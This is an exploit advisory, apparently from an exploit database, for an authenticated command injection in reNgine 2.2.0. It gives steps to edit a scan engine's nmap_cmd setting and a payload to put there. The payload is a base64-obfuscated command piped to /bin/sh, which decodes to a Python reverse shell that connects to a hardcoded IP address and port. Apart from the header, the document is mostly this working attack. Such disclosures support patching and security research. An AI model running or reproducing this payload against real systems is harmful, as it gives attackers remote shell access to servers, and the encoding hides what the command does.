# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’